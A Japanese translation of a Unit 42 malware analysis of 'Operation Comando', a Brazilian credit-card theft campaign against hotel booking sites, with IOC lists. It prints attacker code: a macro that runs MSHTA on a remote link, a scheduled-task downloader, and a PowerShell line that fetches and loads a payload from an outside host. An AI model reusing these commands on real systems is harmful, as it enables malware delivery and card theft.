本ブログは米国で2019年03月12日に公開されたUnit 42ブログ「Operation Comando: How to Run a Cheap and Effective Credit Card Business」の日本語翻訳です。

2018年12月、Palo Alto Networks脅威インテリジェンス調査チームUnit 42のリサーチャーは進行中のキャンペーンを確認しました。このキャンペーンはホスピタリティセクタ、とくホテルの予約に重点を置いていました。最初の分析ではとくに目新しいテクニックや高度なテクニックは見つかりませんでしたが、このキャンペーンの見せる執拗さに興味を引かれました。

ネットワークの痕跡をたどり、そこからこの攻撃者が残した情報(C2 上の閲覧可能ディレクトリ、ドキュメントのメタデータ、バイナリの特性など)に探索を広げました。ここからカスタムメイドのマルウェアが見つかり、これを 「CapturaTela」と名付けました。このマルウェアファミリを発見したことで、なぜホテルの予約が主な攻撃ベクターとして執拗に狙われているのかという理由が分かりました。つまり、顧客からのクレジットカード情報窃取を狙っていたのです。

私たちはこの攻撃者のプロファイルを作成しました。その結果、攻撃者がとる配信メカニズムのほかに、RAT(リモートアクセスツール)や情報窃取用トロイの木馬などの常用ツールについて判明しました。彼らはそうしたツールをGitHubリポジトリにあるオープンソースツールやアンダーグラウンドフォーラムから入手していました。

皆さんは、攻撃者がクレジットカード窃取事業を格安で効果的にドキュメントを調査しているところ運営する方法について疑問に思ったことはありますか。だとすれば「Comando作戦」についてぜひお読みください。


攻撃者の配信メカニズム

このキャンペーンのテレメトリでは、電子メールが主な配信メカニズムとして特定され、2018年8月に最初の関連サンプルが配信されたことがわかりました。攻撃者がよく使用するトピックは旅行の予約やバウチャーに関連したもので、主にブラジル人を対象にしています。表1は、キャンペーン中に見つかった代表的な件名と添付ファイル名の代表的なリストです。

メールの件名 添付ファイル名
Reserva para tres quartos "Ficha cadastral Leticia Ferreira Mendes.ppam", "Ficha cadastral Jacinto Mendes da Silva.ppam", "Ficha cadastral Marcos Portela Correa.ppam", "Ficha cadastral Francisco Prado.ppam"
Reserva Veirano Advogador Roominglist Veirano Advogados .docx
Corrigir data da reserva para o dia 03 Booking – Dados da Reserva.docx
Voucher para reserva Voucher para reserva 02.docx
Reserva Voucher de Reserva ADRIANA MILLER RODRIGUES.ppa

表1このキャンペーンを代表する電子メールの件名と添付ファイル名

キャンペーンで使用されている悪意のあるドキュメントを調査したところ、ドキュメントメタデータに興味深い一貫性があることがわかりました。作成者は徹底して頭字語「CDT Original」を使用しているのです(詳細は図1で確認してください)。

図1 悪意のあるドキュメントのメタデータサンプル

攻撃者は多くのキャンペーンで見られる一般的な方法を複数利用しています。たとえば、MSHTAが実行するリモートスクリプトを外部参照することなどです。このアプローチのおかげで、攻撃者は自身の活動に使うツールやリソースを複数見つけられます。同時にアナリストによるアトリビューション、追跡をより困難にすることができます。観測された方法のなかでもっとも一般的な組み合わせを図2に示します。

図2 複数の配信メカニズム

2018年12月のキャンペーンで配信された電子メールをサンプルとして見てみましょう。この電子メールに添付されていたファイルは会議室リスト(SHA256: ac70d15106cc368c571c3969c456778b494d62c5319)を偽装していて、図2に示したプロセスのひとつを使って配信されていました。図3に記載したのがその詳細なプロセスです。

図3 2018年12月のキャンペーンでの配信サンプル

悪意のあるドキュメントには、MSHTAを使用してリモートにホストされたスクリプトを実行する単純なマクロが含まれています。

Public Sub Auto_Open()
   var0 = "MSHTA https://bit[.]ly/2QXNTHi"
   Var = var0
   Shell (Var)
End Sub

ランディング用URLは次のURLに解決されます。

hxxps://internetexplorer200[.]blogspot[.]com/

bit.ly上のURL短縮リンクの統計は弊社のテレメトリでの観測内容を裏付けるものでした。図4の「12月27日から28日にかけてのBit.lyキャンペーンの分布」からも分かるとおり、攻撃者は主にブラジルをターゲットとしています。

図4 12月27日から28日にかけてのBit.lyキャンペーンの分布

 

MSHTAは、ごく単純なアルゴリズムを使用してエンコード/難読化されたVBScriptコンテンツを実行します(コード全体にポルトガル語の単語があることに注意してください)。

図5 MSHTAを介して実行される第1段階のVBScriptコード

これにより、次のスケジュールされたタスクがシステム内に作成され、そこで別のリモートロケーションからMSHTAを介して新しい第2段階のVBスクリプトが呼び出されます。このスクリプトでもコメントに「CDT」への言及が見られることに注目してください。

"set shhh = CreateObject(\"WScript.Shell\")\r\n   Dim var1\r\n var1 = \"cmd.exe /c SchTasks /Create /sc MINUTE /MO 240 /TN AdobeUpdateSD /TR \"\".exe https://minhacasaminhavidacdt.blogspot[.]com/\"\r\nshhh.run var1, vbHide\r\n"

図6 第2段階のVBスクリプト

この第2段階のVBスクリプトは、PowerShellリフレクションを介して最終的なペイロードをメモリにロードし、GIFの拡張子を持つファイルからバイナリコンテンツを取得します。

"CreateObject(\"Wscript.Shell\").run  \"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://achoteis.com[.]br/images/64.gif'))).EntryPoint.Invoke($null,$null)\"\r\n"

このケースで配信されている最後のペイロードは、商用ツールRevenge Remote Access Trojan(RAT)です。このツールを使うことで、情報窃取が容易になります。


インフラ分析

インフラのレベルを見てみると、攻撃者はDuckDNS、WinCo、No-IPなどの動的DNS(DDNS)サービスを利用しています。これらの多くは無料アカウントを提供しているので、攻撃者がインフラにかける投資を削減してくれます。使用中のドメインサンプルを表2に示します。

動的DNSドメイン
systenfailued.ddns[.]com[.]br
office365update[.]duckdns[.]org
cdtoriginal[.]ddns[.]net

表2 このキャンペーンに関連付けられているドメインサンプルのうちDDNSプロバイダを使用しているもの

無料サービス、ペーストサイト、侵害されたサイトなどの利用にくわえて、おそらくは攻撃者が所有していると思われるドメインが少なくとも1つ特定されています。ドメイン"fejalconstrucoes[.]com[.]br"は、ペイロードをホストし、潜在的な被害者に電子メールを送信するために使用されてきました。図7は、DNS WHOISレコードに表示されるドメインの詳細です。このドメインはブラジルのUOLサービスを利用して登録されていました。

図7 DNS WHOISレコード

このキャンペーンに属する悪意のある添付ファイル付きの電子メールは、次のような特徴があります。

ドメイン: fejalconstrucoes[.]com[.]br
送信者: mmcorrea@fejalconstrucoes.com.br, marcos@fejalconstrucoes.com.br
添付ファイル名: Contrato Anual FEJAL Construçoes.ppa

先に述べたように、この攻撃者は、自身の使用するドメインやパスに繰り返し頭字語 「CDT」を使用するという興味深い特徴が見られます。

hxxp://bit[.]ly/cdtqueda
hxxp://cdtoriginal.ddns[.]net

ビジネスに貢献する主な要因は「CapturaTela」

本件の調査中、C2上に閲覧可能なディレクトリが見つかり、ここから攻撃者が使用したペイロードをいくつか見つけることができました。表3に、見つかったペイロードとドキュメントの組みあわせ一覧を示します。ここでもやはり頭字語 「CDT」がファイル名に繰り返し利用されています。

ファイル名 SHA256
CDT.hta 4485a8f339171ca86f7e38b912f0f28072ffe04404d5062af3a60f322566f870
Copia Detalhe da reserva – Booking.ppam

 

ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187

 

DadosDaReserva.doc

 

03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677

 

DillI.js

 

d5f4d7fb7c8042b047e9f3d93d5f02841f01889ba8a899c0c1ed7064129e3bb4

 

quasar.jse

 

03d7de252c30c87d6b156b4fbcdcd008ef6bae319a9c42613aaa01428bd490e3

 

表3 cdtmaster[.]com[.]brの閲覧可能ディレクトリで確認できた内容

ファイル名こそ「quasar.jse」となっていますが、その中身はQuasarRATではなく、base64エンコードされたベーシックなペイロードドロッパー(図8参照)を含むJSスクリプトでした。調査してみると、ごくシンプルですが興味深いペイロードが見られました。

図8 base64エンコードされたペイロードドロッパーを含むJSスクリプト

デコードされたペイロードは.NETで作成されたPEファイルで、情報窃取機能を備えています。このなかでメインとなるメソッドの1つが「CapturaTela」で、私たちはここからマルウェアファミリ名前を付けました。そのポルトガル語の名前が示すように、このマルウェアはスクリーンショットをBitmapオブジェクトとして保存する機能を備えています。

図9 CapturaTelaメソッドのスクリーンキャプチャ機能

この情報窃取用トロイの木馬の主な機能は次のとおりです(図10を参照)。

  • 開いているプロセスのリストを順に確認し、特定のウィンドウタイトルを探します。対象となるタイトルに「ls . B」または「o . B」という文字列が含まれていれば、次の活動を実施します。
  • これらの条件を満たすタイトルが見つかれば、スクリーンショットが撮影され、JPEG添付ファイルとして電子メールで送信されます(図12を参照)。
  • 完了すると、既存のChromeプロセスを強制終了します。ウィンドウのタイトルは、おそらくChromeのタグの内容に基づいたものでしょう。

図10 CapturaTelaで主な機能を実行するループ

図11 CapturaTelaの電子メール抽出を実行している部分

CapturaTelaの機能を検証するため、私たちはタイトルに先の条件に一致する文字列を含めたシンプルなWebページと検証用の電子メールアカウントを用意し、悪意のあるサンプルにパッチを当てました(図12を参照)。

図12 テスト用HTMLページでCapturaTela機能のデバッグをしているところ

この結果、図13に示すとおり、攻撃者が被害者から収集しようとした情報を抽出する際の形式と内容を確認できました。

図13 抽出されたデータを含む電子メールを受信

 

ここまでの調査で残った唯一の疑問は「情報窃取用トロイの木馬が探していたコンテンツの種類とウィンドウのタイトルは何だったのか」ということです。どういった種類のWebページが「ls · B」ないし「o· B」継続敵という文字列をタイトルに含むのでしょうか。

当初、こうした特徴を持つWebサイトを見つけるのはまず無理ではないかと思われましたが、キャンペーンの設定した標的や電子メール配信セッションのメタデータなどの分かっていることから調査を開始しました。このデータから、英語とポルトガル語の両方で、Webサイトのページタイトルに特定の(ただし業界と業界の性質に共通の)用語を含む潜在的なターゲットWebサイトを特定することができました。そして、この用語が含まれていれば、マルウェアのクレジットカード窃取機能が呼び出されるのです。見つかったWebサイトから、攻撃者は特定の購入プロセスにおいて被害者のクレジットカード情報をすべて取得することに重点をおいていることが分かりました。

いくつかのCapturaTelaサンプルを分析し、電子メールの設定部分の内容を抽出すると、表4に示すとおり興味深い文字列が複数見つかりました。

興味深い文字列
Comando30
Comando30@cdt
comando50

表4 電子メールの設定に含まれていた興味深い文字列

攻撃者が繰り返し「CDT」という頭字語使用していること、「CoManDo」という単語の各音節がCDTの最初の文字に紐付くこと、これらの特徴から、私たちはこのキャンペーンを「Comando作戦」という名前で説明することにしました。


リモートアクセス用トロイの木馬を多用

この攻撃者はカスタム作成したトロイの木馬CapturaTelaのほかに何種類ものリモートアクセストロイの木馬を使って悪意のある活動を行っています。次のRATマルウェアファミリは同攻撃者によるキャンペーン活動中に観測されたものです。

RATファミリ
LimeRAT
RevengeRAT
NjRAT
AsyncRAT
NanoCoreRAT
RemcosRAT

表5 同キャンペーンで観測されたRATファミリのうち主なもの

攻撃者は、複数のRATツールを使用することで、自身のビジネス上の目標を高めようとしているものと考えられます。攻撃者が感染した被害者を使って標的となったWebサイトから窃取できるクレジットカード情報にくわえてさらに多くの情報を窃取できるからです。

彼らが使用しているRATファミリーのいくつかは、GitHubで見つけることができます。

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

https://github.com/NYAN-x-CAT/Lime-RAT


公開されているリサーチ内容との重複

この調査で見つかったドメインとサンプルのいくつかは、すでに過去にYoroiが研究・報告がしていたものでした。ですが、私たちは今回の研究の結果、使用された技術に若干の重複は見られるものの、このキャンペーンはGorgonグループに関連していないという強い信念を持っています。


結論

Comando作戦は、ホスピタリティセクタに的を絞って執拗に付け狙う純粋なサイバー犯罪キャンペーンで、おそらくはブラジル起源のものです。この作戦から、脅威攻撃者が予算は格安に抑えつつ、目的をうまく達成している方法が見て取れます。DDNSサービス、パブリックに利用可能なリモートアクセスツール、ソフトウェア開発(この場合はVB.NET)に関する最低限の知識さえあれば、月単位でキャンペーンを継続し、クレジットカード情報そのほかのデータを集めるのに十分なのです。

このサイバー犯罪キャンペーンは引き続き活発に行われていますが、Palo Alto Networksのお客様は次のようにしてこれらの脅威から保護されています。

  • WildFireは、マルウェアとして配信されたすべての悪意のあるドキュメントとペイロードを検出します。
  • AutoFocusをお使いのお客様は、OperationComandoタグを使用してこのキャンペーンを追跡できます。
  • Trapsは、このキャンペーンに関連付けられているすべてのファイルをブロックします。

パロアルトネットワークスは本稿で見つかったファイルサンプルや侵害の兆候などをふくむ調査結果をCyber Threat Alliance(CTA サイバー脅威アライアンス)のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使用して、お客様に保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害することができます。Cyber Threat Allianceの詳細についてはwww.cyberthreatalliance.orgをご覧ください。

IOC

インフラ

  • internetexplorer200[.]blogspot[.]com
  • office365update[.]duckdns[.]org
  • olhomagicocdt[.]duckdns[.]org
  • 498408[.]ddns[.]net
  • Systenfailued[.]ddns[.]com[.]br
  • internetexploter[.]duckdns[.]org
  • ssl9294[.]websiteseguro[.]com
  • fejalconstrucoes[.]com[.]br
  • c-d-t[.]weebly[.]com

悪意のある文書

  • 55732ba1b1e94add5e75e90d5eba137bfbfbd35e537b8d5c9a01365f5a6407d7
  • 7f13f449c80cc003d369c6b6002fd4912788e014ce35e97b29ba168136c6ece6
  • 47c471da52aa808250357c4638078c9e13797bb6a8a8b169d4b33d95ff230e89
  • 0c85b2ebc7c5316b7878239daf6a611fc2d0a05966f541e83e19db96f41fd3aa
  • 62f82e636924980b622204368f586723feb82594ce256e2e65ac5307fd67d669
  • 1c637cf4276b589f1b2806a77310b90c214cd0b026e4ec69448887be331ba5b3
  • d96eaf8f22ec5cb9edba6369f9980efc8b0f76bf35eaf92aa5cb5e03669ddd9f
  • 1df7ace77a7f146b1bbd5c881134083f886ea83017f4619a9e62a9743909cdd1
  • 03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677
  • ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187
  • 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910
  • d67e160ccc6ac2fb8cd330e9fd53389fb1f99fad680d27045e5291e9d23d9317
  • 7f41ae21f3ad37505e5b3d0551caeb85bc9e07571d7d98acd3489b5db8ba6741
  • 3f3718b7e50eee8b0b3e4a4da8c5a0302623b5800eb7bc0718036f77a6ec72c0
  • a44e08b7ebd6bf73a9eb1b5a483987a1f0e3fdfe12b05a7a8f4ec1febfcf959e
  • 4211e091dfb33523d675d273bdc109ddecf4ee1c1f5f29e8c82b9d0344dbb6a1
  • fd8781f125ac1ee68afb8dba61e17373ebe57bfd18850a01d41caaddde4cffcb
  • 269eb444415489a7898af36f1ba105129655226c98753d87afec651219e158c7
  • ee9d3c90df5c01dc6e2079d1219be752542a452988c4a25f34b8ee22be799332
  • 41b57429b00383f2b5d60fb22283b5c14a94ab8619c527e7d749e64b56d31518
  • ce44559beb4a5d52d962ab9e375970ef1d8e9f22a0be8c971b0244ebca61b2f2
  • ccd23e44662953d0837ca12728854bfd61f5ea14293a1620c3b48ba8f435a432
  • 57f31ef70a8b8b39659659abd0f1c8974fe23d2cbd2194d097375b2667a5424b
  • f534f9b1cc64f03c32d59acdf9d58653bb0076798805af12e6cd914cbbfcf5fa
  • 846a89bbcf6c907fd915699a232c1f9acae0756fdc12c590198bfe65b4c90f44
  • 4f2ce6883b7057bde6baed2607e4645e4745db9ebfb20872e425944ba8ec3425
  • 722a2d8d4c1fb1e5195df50b159cdce0b05333acbb3ec90d24310331d21d2514
  • e54bfccc796a4f779d332e535f78a5b118dbcd8a8971e39ac059ee9f069a1203
  • 4f4ea063d5bd22f1c57cdcf89d40339ddd5d5741c1b1dabfe52a474d70be9d04

CapturaTela

  • c7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a
  • 904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f
  • a03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6

RAT

  • 2b343e0b0aa8de557fa11c9918f1b93ab6e88d9bd11565c587852d4d17bcf5a8
  • 57d83d5928bb8926718e732a85dd69dffe6ff61ff7edd9b843a50959f2fd1256
  • 33195ec463ba9d627a0c177eca366bbefa34306170449a5c0ef7661319ba2b05
  • 7eaea64fdfdc4f35ffe3036ee03f54c4aace204533a9d157faafa4a23221980c
  • e76772ae83e2c79ed4aa80b5b7f4b42c46cea45ed1d15bd004b0dc71bfc41945
  • 977d940de630fff225e4917927d47100b75b56444c4117a22aa34b1450dc2930
  • 8a700793012385a706ef277f043bb5bf8a5ef877e3ba1fac3b5601df7fb36a30
  • c740fe0dbf5aebf5f34e392a9bff0d4a19bf20ff553bb734574c2593ddcbbfa1
  • 10a7ba12bebaa572eb6eb4bef6d1a5043c5403bf796626a478205b344c4dc8c2
  • 4aff04954efd6cb02b1ba18831a72d44b2346db94e944a9f96c652f5944834d0
  • d735d39de62009d09d7125f71cd774b23b6ab4a51d1dbb3d49003a5657b3477f
  • 9ad38281585897b1d49632ad049c700814f72e20edc46bbc43ba510413ac6f92
  • 877453c0e614e732eb9ee378693cf92263d2373e09c8287e3a4a821ecee29764
  • b82c7535e41cddade675587ddaac9cb63fdf1973968f10f3a2bc1ea5409a29c2
  • ec824085dac0d7e0d2e3953d241756a78635a32ad442b7909f0895fd62b08010
  • 5c073adb376b57c99faa9cf10114beda732b13d04b7ed45a32c23eb043ec608f
  • 8d1db84b71eb1f38f95c13c89a6adfbc64d7ca5c5a5165ae7919e0d1e6fadc45
  • b278ccf189d51b085390a985526ff37455ebe249ca9da69f64e2376979c56e6b
  • e99df30a89dee25f56c2f35b20de2206406934f2e6ab043e299482649dce2cb8
  • 8e738b2239bbca9f50eab5f3cf3cbe58138e3b2515221c67e7eb934e2d3c7486
  • b904e2823144ca9ab3161c3e508a88dc35922340e4ff2858e06b40e638bfd359
  • 99b70d49377117000eaf367c037ed68c4898b0d8769f7bff88a438a9d82db214
  • 982e2abc769f579a8753e8b2f65e0b0bbfbbdbae14b88f0ed697b635a9f4e38f
  • 03cb44736cdd60318af8399047507b011b95fadd4784b1607b28ad4940a9a36e
  • e9f42c7fbedf0054391c3a85b79a34b5be134b40a83961cc90d0e473380fde1c
  • 6c45909d6311f8d356ddc704b27bd975cb3336a7b6e172206165bff613f94a2a
  • 9025c9b8cfc57e7dda5e742f18d69b4c4477f9254d10c5df15b7a6ffcf7d5985
  • ae3cddb0f665d739ebf5342a968585a5d13d54068ef59a51e82e739d184c6b3b
  • d5baf4a27994ef2110bcc3a0b3ff2cd3815bac36d271462d1a39f77063bae9a5
  • b0593829ea59d267f511f2685aa8ecf31860e123e0928ca8bf3fc1e30b3c4953
  • 1c30a54a8ad30faff0a7b309d377127ed739ea80c510d7526bbb5cbe6ef5cfc9
  • 498fd1c4cb16f39974555d6e596fcea6c7da73f9f0f30f57fdc8177fc3feaa4e
  • 1c604e040c04be9fad3129d7bd9c69b7f8057050b2002605dde1f5e60817f89a
  • 5dfd79503b19b67052ec060d74e1f2a9a5ee34de74d578c5b4499468bad8f1cb
  • bc4c98116fadbcef2abfd0fe62a15b154a3b8a8eb329a877d64edc59260519c4
  • 9c794069b4d6346f8152b938e4f846af63d1f1015c935579d99af1c434789406
  • 7923c59d1405deacaceb26722db97714cf955610e02bf6d28051505331603606
  • a03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6
  • c7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a
  • 824d080a4da2275951a28285b66faac1698205dff181fe5fa1cf172ac1a17d8f
  • 0b04028774f0e166dcbe0f993b72c430dc15364e9cc52c221bdadcc9833816f2
  • 22e9260c6a4af1d42c353c7004cb2f5f245cea5e22572b111fcef4318c17e567
  • 904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f
  • 7a9e3038d498d5ecaed19f6a80d9b0b7d73d47e669be8d61ca32d87566d7a035
  • 16ea765b2c51eadc61c6501b4ba96073a7d50f8cd7898285ffad49ba14a121dd
  • 18199bb3ad69901ef0040aa7445d6f0c8571a19cdade3115ffc9c142c0b5b721
  • b940dc214f6a0be58e93f07aafcbc5a7518544f745413360269949664909fecd
  • 2d26bc42a499c4658523193ade85df13ab397d375fa593a757c54a6f1c71f221
  • 94a38857ebeed7d10480fb91a391a891d5a11137fabb8fc67b71c989b5e328e6
  • 116da8803ac9b2dd7e1149567f227d552e84db86dd7a33ad69e15b560f0fa177
  • 2945e6424f51e6077620a867e0f9c725b9b816164366912289ab6c24fdfcb9e6
  • 88d1a891cfdf09b7e1882582a82c3218d5606ed530764d34ee1410198ca9ee8b
  • 96424d66b7423dc54b35e4968a809a8b67d1dd8e7d8d3b0d84434edb94c822c5
  • 3158906cf7cb3186654bbb62d087b9a150c12c51d2ad67dd9003abeb0f69626a
  • 4e62dcea72cf73481dd8dae2bbeb8e1352a5f2510f3deb98ec0b653a4d21f8d8
  • 5370711dd45b84b9644b635d03baad08d75ff740364e93ed023adc9c4a297c43
  • 02254a03f08055399806b6457ee5e4fe6cfc47c6f75254434a14332d4c43afe5
  • bf07b4ba117eb7d0ac59cbdd775e6a509c06a462b709b4f2d10979c9e5b3cf85